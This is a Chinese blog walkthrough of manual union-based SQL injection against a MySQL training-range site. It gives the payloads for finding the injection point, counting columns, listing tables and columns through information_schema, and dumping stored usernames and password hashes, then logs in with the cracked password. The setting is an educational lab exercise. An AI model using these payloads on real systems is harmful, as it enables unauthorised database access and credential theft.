<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.9.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>Mysql基础注入 | 顾北清</title><meta name="description" content="Mysql基础注入"><meta name="keywords" content="安全,CTF,Mysql"><meta name="author" content="顾北清"><meta name="copyright" content="顾北清"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/imgs/favicon.ico"><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="canonical" href="https://www.gubeiqing.cn/2019/06/14/mysql05/"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="Mysql基础注入"><meta name="twitter:description" content="Mysql基础注入"><meta name="twitter:image" content="https://image.3001.net/images/20190614/1560520976146.jpg"><meta property="og:type" content="article"><meta property="og:title" content="Mysql基础注入"><meta property="og:url" content="https://www.gubeiqing.cn/2019/06/14/mysql05/"><meta property="og:site_name" content="顾北清"><meta property="og:description" content="Mysql基础注入"><meta property="og:image" content="https://image.3001.net/images/20190614/1560520976146.jpg"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="prev" title="堆叠注入" href="https://www.gubeiqing.cn/2019/10/06/CTF-SQL3/"><link rel="next" title="手动搭建Docker本地私有镜像仓库" href="https://www.gubeiqing.cn/2018/10/27/docker14/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://www.gubeiqing.cn/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  highlight_copy: 'true',
  highlight_lang: 'true',
  highlight_shrink: 'false',
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: '添加书签',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  copyright: undefined,
  copy_copyright_js: false
  
}</script></head><body><div id="header"> <div id="page-header"><span class="pull-left" id="blog_name"><a class="blog_title" id="site-name" href="/">顾北清</a></span><i class="fa fa-bars fa-fw toggle-menu pull-right close" aria-hidden="true"></i><span class="pull-right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 时光轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a></div><script>document.body.addEventListener('touchstart', function(){ });</script></div></span><span class="pull-right" id="search_button"><a class="site-page social-icon search"><i class="fa fa-search fa-fw"></i><span> 搜索</span></a></span></div></div><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="lozad avatar_img" src="/img/avater.png" onerror="onerror=null;src='/img/friend_404.gif'"></div><div class="mobile_post_data"><div class="mobile_data_item is_center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">52</div></a></div></div><div class="mobile_data_item is_center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">16</div></a></div></div><div class="mobile_data_item is_center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">11</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 时光轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a></div><script>document.body.addEventListener('touchstart', function(){ });</script></div></div><div id="mobile-sidebar-toc"><div class="toc_mobile_headline">目录</div><ol class="toc_mobile_items"><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#判断注入点"><span class="toc_mobile_items-number">1.</span> <span class="toc_mobile_items-text">判断注入点</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#猜解字段数"><span class="toc_mobile_items-number">2.</span> <span class="toc_mobile_items-text">猜解字段数</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#查询数据表"><span class="toc_mobile_items-number">3.</span> <span class="toc_mobile_items-text">查询数据表</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#查询列名"><span class="toc_mobile_items-number">4.</span> <span class="toc_mobile_items-text">查询列名</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-4"><a class="toc_mobile_items-link" href="#查询数据"><span class="toc_mobile_items-number">5.</span> <span class="toc_mobile_items-text">查询数据</span></a></li></ol></div></div><div id="body-wrap"><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true">     </i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#判断注入点"><span class="toc-number">1.</span> <span class="toc-text">判断注入点</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#猜解字段数"><span class="toc-number">2.</span> <span class="toc-text">猜解字段数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#查询数据表"><span class="toc-number">3.</span> <span class="toc-text">查询数据表</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#查询列名"><span class="toc-number">4.</span> <span class="toc-text">查询列名</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#查询数据"><span class="toc-number">5.</span> <span class="toc-text">查询数据</span></a></li></ol></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://image.3001.net/images/20190614/1560520976146.jpg)"><div id="post-info"><div id="post-title"><div class="posttitle">Mysql基础注入</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 发表于 2019-06-14<span class="post-meta__separator">|</span><i class="fa fa-history" aria-hidden="true"></i> 更新于 2019-10-06</time><span class="post-meta__separator mobile_hidden">|</span><span class="mobile_hidden"><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Mysql/">Mysql</a></span><div class="post-meta-wordcount"><span>阅读量: </span><span id="busuanzi_value_page_pv"></span></div></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><p><strong>实验环境：墨者学院Mysql手工注入漏洞测试靶场</strong><br>后台源码没有进行任何字符过滤。</p>
<p>首先进入靶场环境<br><img alt data-src="https://image.3001.net/images/20190614/15605103136843.jpg" class="lozad"><br>先用<code>admin</code>弱密码登陆试试<br><img alt data-src="https://image.3001.net/images/20190614/15605162158713.jpg" class="lozad"><br>果然不行，这时看到用户登录下方有一个停机维护通知，点进去瞅瞅<br><img alt data-src="https://image.3001.net/images/20190614/15605104475821.jpg" class="lozad"><br>看到这里链接上有<code>id = 1</code>,怀疑这里会有注入点。</p>
<h4 id="判断注入点"><a href="#判断注入点" class="headerlink" title="判断注入点"></a>判断注入点</h4><p>先简单判断是不是字符型注入点，使用单引号闭合语句,注释后面的语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id = 1&apos;--+</span><br></pre></td></tr></table></figure>

<p><img alt data-src="https://image.3001.net/images/20190614/15605106681494.jpg" class="lozad"><br>发现页面有异常，可能不是字符型，再试试数字型注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id = 1 and 1 = 1</span><br></pre></td></tr></table></figure>

<p><img alt data-src="https://image.3001.net/images/20190614/15605107834469.jpg" class="lozad"><br>发现<code>and 1 = 1</code>没有返回异常，再进一步进行判断</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id = 1 and 1 = 2</span><br></pre></td></tr></table></figure>

<p><img alt data-src="https://image.3001.net/images/20190614/15605108646837.jpg" class="lozad"><br>页面出现异常，说明这里存在数字型注入点</p>
<h4 id="猜解字段数"><a href="#猜解字段数" class="headerlink" title="猜解字段数"></a>猜解字段数</h4><p>发现存在注入点之后使用<code>order by</code>语句判断字段的数目。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1 order by 3</span><br></pre></td></tr></table></figure>

<p><img alt data-src="https://image.3001.net/images/20190614/1560511160681.jpg" class="lozad"><br>先试一下是不是3列，发现没有报错，说明至少存在3列，接着猜解。<br><img alt data-src="https://image.3001.net/images/20190614/1560511220341.jpg" class="lozad"><br>尝试到5发现报错了，因为字段没有5列，使用<code>order by</code>时无法根据第5列排序，所以出错，由此判断字段数目是4.</p>
<p>####联合查询<br>因为猜解出来的字段数是4，所以联合查询的语句应该这么写<code>?id=1 union select 1,2,3,4</code>,但因为这个语句是成立的，为了让页面爆出我们需要的字段，这里就需要构造一个错误的语句，让数据库报错时返回我们需要的信息。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1 union select 1,2,3,4</span><br></pre></td></tr></table></figure>

<p><img alt data-src="https://image.3001.net/images/20190614/15605148841175.jpg" class="lozad"><br>可以看到这里页面上爆出了2和3两个数字，说明2和3两个数字对应当前数据表的两个字段会回显到页面上的，这样就可以根据2，3两个回显位查询一些我们需要的信息。<br>常用的Mysql系统函数有：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">version()            #MySQL版本</span><br><span class="line">user()               #数据库用户名</span><br><span class="line">database()           #数据库名</span><br><span class="line">@@datadir            #数据库路径</span><br><span class="line">@@version_compile_os #操作系统版本</span><br></pre></td></tr></table></figure>

<p>比如查询当前的数据库名称和当前用户。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1 union select 1,database(),user(),4</span><br></pre></td></tr></table></figure>

<p><img alt data-src="https://image.3001.net/images/20190614/1560515289332.jpg" class="lozad"><br>这样我们就成功查询到当前数据库，接着找这个数据库里的数据表。</p>
<h4 id="查询数据表"><a href="#查询数据表" class="headerlink" title="查询数据表"></a>查询数据表</h4><p>补充1：数据库关键库<br>这里需要使用到数据库中一个重要的库<code>information_schema</code>，这个库下面的<code>schemadata</code>表中存放着所有数据库的信息，其中<code>schema_name</code>列中保存着所有数据库名，<code>tables</code>表中存放着所有数据表的信息，其中<code>table_schema</code>列存放着数据库名，<code>table_name</code>列存放着数据表名，<code>columns</code>表中存放着所有数据表的所有列信息，其中<code>column_name</code>存放着所有列名，<code>table_name</code>存放着表名。<br>补充2：concat函数的用法</p>
<p>1.concat(str1,str2)<br>将多个结果一行返回。如有任何一个参数为NULL ，则返回值为 NULL。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select 1,2,3;</span><br><span class="line">+---+---+---+</span><br><span class="line">| 1 | 2 | 3 |</span><br><span class="line">+---+---+---+</span><br><span class="line">| 1 | 2 | 3 |</span><br><span class="line">+---+---+---+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt; select concat(1,2,3);</span><br><span class="line">+---------------+</span><br><span class="line">| concat(1,2,3) |</span><br><span class="line">+---------------+</span><br><span class="line">| 123           |</span><br><span class="line">+---------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<p>2.concat_ws(separator,str1,str2)<br>concat_ws是concat()的特殊形式。第一个参数是其它参数的分隔符,分隔符可以是一个字符串，也可以是其它参数。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select concat_ws(&apos;~&apos;,1,2,3);</span><br><span class="line">+----------------------+</span><br><span class="line">| concat_ws(&apos;~&apos;,1,2,3) |</span><br><span class="line">+----------------------+</span><br><span class="line">| 1~2~3                |</span><br><span class="line">+----------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<p>3.group_concat完整语法如下，默认使用逗号分隔多个结果：<br>group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator ‘分隔符’] )</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_name = database()</span><br></pre></td></tr></table></figure>

<p><img alt data-src="https://image.3001.net/images/20190614/15605155258786.jpg" class="lozad"><br>这样就查询到当前数据库里面有两个数据表，分别为<code>StormGroup_member</code>,<code>notice</code>。</p>
<h4 id="查询列名"><a href="#查询列名" class="headerlink" title="查询列名"></a>查询列名</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=&apos;StormGroup_member&apos;</span><br></pre></td></tr></table></figure>

<p><img alt data-src="https://image.3001.net/images/20190614/15605156481273.jpg" class="lozad"><br>查询到有这个表有四个字段<code>id</code>,<code>name</code>,<code>password</code>,<code>status</code>。</p>
<h4 id="查询数据"><a href="#查询数据" class="headerlink" title="查询数据"></a>查询数据</h4><p>根据上面查询到的四个字段查询数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1 union select 1,concat_ws(&apos;~&apos;,id,name,password,status),3,4 from StormGroup_member</span><br></pre></td></tr></table></figure>

<p><img alt data-src="https://image.3001.net/images/20190614/15605157848912.jpg" class="lozad"><br>成功查到账号密码，不过这个密码好像是加密的，先进行解密<br><img alt data-src="https://image.3001.net/images/20190614/15605159017760.jpg" class="lozad"><br>使用这个账号密码登陆试试<br><img alt data-src="https://image.3001.net/images/20190614/15605160192900.jpg" class="lozad"><br>最后尴尬的一幕出现了(/哭)。</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">顾北清</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://www.gubeiqing.cn/2019/06/14/mysql05/">https://www.gubeiqing.cn/2019/06/14/mysql05/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://www.gubeiqing.cn">顾北清</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/安全/">安全    </a><a class="post-meta__tags" href="/tags/CTF/">CTF    </a><a class="post-meta__tags" href="/tags/Mysql/">Mysql    </a></div><div class="post_share"><div class="social-share" data-image="https://image.3001.net/images/20190614/1560520976146.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button"><i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="lozad post-qr-code__img" src="/img/wechat.jpg"><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="lozad post-qr-code__img" src="/img/alipay.jpg"><div class="post-qr-code__desc">支付宝</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull-left"><a href="/2019/10/06/CTF-SQL3/"><img class="prev_cover lozad" data-src="https://ws1.sinaimg.cn/large/bf75d723gy1g7n07ahswsj20v60mzglo.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">上一篇</div><div class="prev_info"><span>堆叠注入</span></div></a></div><div class="next-post pull-right"><a href="/2018/10/27/docker14/"><img class="next_cover lozad" data-src="https://image.3001.net/images/20181128/15434082114529.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">下一篇</div><div class="next_info"><span>手动搭建Docker本地私有镜像仓库</span></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span> 相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/2019/10/06/CTF-SQL3/" title="堆叠注入"><img class="relatedPosts_cover lozad" data-src="https://ws1.sinaimg.cn/large/bf75d723gy1g7n07ahswsj20v60mzglo.jpg"><div class="relatedPosts_title">堆叠注入</div></a></div><div class="relatedPosts_item"><a href="/2018/09/23/Access手工注入/" title="Access手工注入"><img class="relatedPosts_cover lozad" data-src="https://image.3001.net/images/20190614/1560520976146.jpg"><div class="relatedPosts_title">Access手工注入</div></a></div><div class="relatedPosts_item"><a href="/2018/07/16/Arp攻击/" title="基于内网的ARP攻击"><img class="relatedPosts_cover lozad" data-src="https://ws1.sinaimg.cn/large/bf75d723ly1g24qqn9xrij218g0p0ab1.jpg"><div class="relatedPosts_title">基于内网的ARP攻击</div></a></div></div><div class="clear_both"></div></div><hr><div id="post-comment"><div class="comment_headling"><i class="fa fa-comments fa-fw" aria-hidden="true"></i><span> 评论</span></div><div class="vcomment" id="vcomment"></div><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = false == true ? true : false;
var verify = true == true ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;

window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'etQ1GroxxTqv7vVnzKADlaBs-gzGzoHsz',
  appKey:'lvnmYs6uvsavXQ0IMsuFvl9M',
  placeholder:'说点什么吧！',
  avatar:'mm',
  guest_info:guest_info,
  pageSize:'10',
  lang:'',
  recordIP: true
});</script></div></div></div><footer><div id="footer"><div class="copyright">&copy;2018 - 2019 By 顾北清</div><div class="framework-info"><span>驱动 </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a href="https://github.com/jerryc127/hexo-theme-butterfly"><span>Butterfly</span></a></div><div class="footer_custom_text">梦里不知身是客，一晌贪欢。</div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换">简</a><i class="nightshift fa fa-moon-o" id="nightshift" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><a id="to_comment" href="#post-comment" title="直达评论"><i class="scroll_to_comment fa fa-comments">  </i></a><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/js-cookie@2/src/js.cookie.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script async src="/js/search/local-search.js"></script><script src="/js/nightshift.js"></script><script src="/js/baidupush.js"> </script><script src="/js/activate-power-mode.js"></script><script>POWERMODE.colorful = true; // make power mode colorful
POWERMODE.shake = true; // turn off shake
document.body.addEventListener('input', POWERMODE);
</script><script src="/js/tw_cn.js"></script><script>translateInitilization()

</script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@1.2.2/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script><script>const observer = lozad(); // lazy loads elements with default selector as '.lozad'
observer.observe();
</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>